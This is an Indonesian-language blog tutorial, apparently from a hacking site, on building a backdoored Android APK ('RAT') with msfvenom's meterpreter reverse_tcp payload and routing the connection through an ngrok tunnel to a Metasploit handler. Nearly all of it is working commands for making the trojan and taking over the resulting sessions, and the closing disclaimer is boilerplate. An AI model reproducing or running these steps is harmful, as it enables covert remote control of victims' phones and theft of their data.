Backdoor Beda Jaringan Metasploit + Ngrok

Kali ini gw bakal share Cara Membuat RAT Beda Jaringan. Kalian pada tau gak RAT itu apaan ? Setau gw sih ya, RAT adalah kata singkatan dari Remote Administration Tool, atau disebut juga sebagai Remote Access Trojan. Bener gak?
Asudahlah...

Sebelumnya baca juga nih

• Cara Forwarding Port Dengan Ngrok   

Biar sedikit paham lah, wkwkwk.. Ok next ya, 

Bahan

 - Kali OS
 - Metasploit
 - Ngrok
 - Internet 

Lanjutkan

kita setting port forward dulu, buka terminal dan ketikan perintah berikut.
 
  #echo 1 > /proc/sys/net/ipv4/ip_forward


Jika sudah, kita siapkan port yang mau di pakai (bebas) dan buka ngroknya, gw pakai yang 4455, tapi sebelumnya kita install dulu authtoken ngroknya. Caranya masuk ke sini, login dan copy authtokennya 

 Kemudian install, ketik perintah ini di terminal

    #./ngrok authtoken xxxxxxxx

Nah nanti authtoken akan terinstall di /root/.ngrok2/ngrok.yml , kalo udah gini baru kita forward portnya, perintahnya
 
  #./ngrok tcp 4455

 
Kalo buat backdoor kan kita pakai reverse tcp ip,  jd yg diforward servicenya adalah tcp. Kita buat payloadnya, kalo windows ya silahkan inject untuk windows, kalo disini gw mau bikin payload buat android

#msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=17509 R > Backdoor.apk


Buka metasploit dengan perintah ini

  #msfconsole

Dan reverse_tcp attack deh, perintahnya ini dibawah
  
   #use exploit/multi/handler
  
  #set payload android/meterpreter/reverse_tcp

  #set lhost 0.tcp.ngrok.io

  #set lport 4455
  
  #exploit

Gampang kan? oh iya, kalo misalkan exploit sukses, tpi session meterpreternya run di background kalian tinggal ketik ini diperintah terminal metasploitnya

  #sessions -l

Nah nanti muncul id sessions yang aktif, tinggal ketik aja ini

   #sessions -i (id)

Ya gitulah kira-kira, kalo udah dapet sessionnya eksekusi deh..


NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami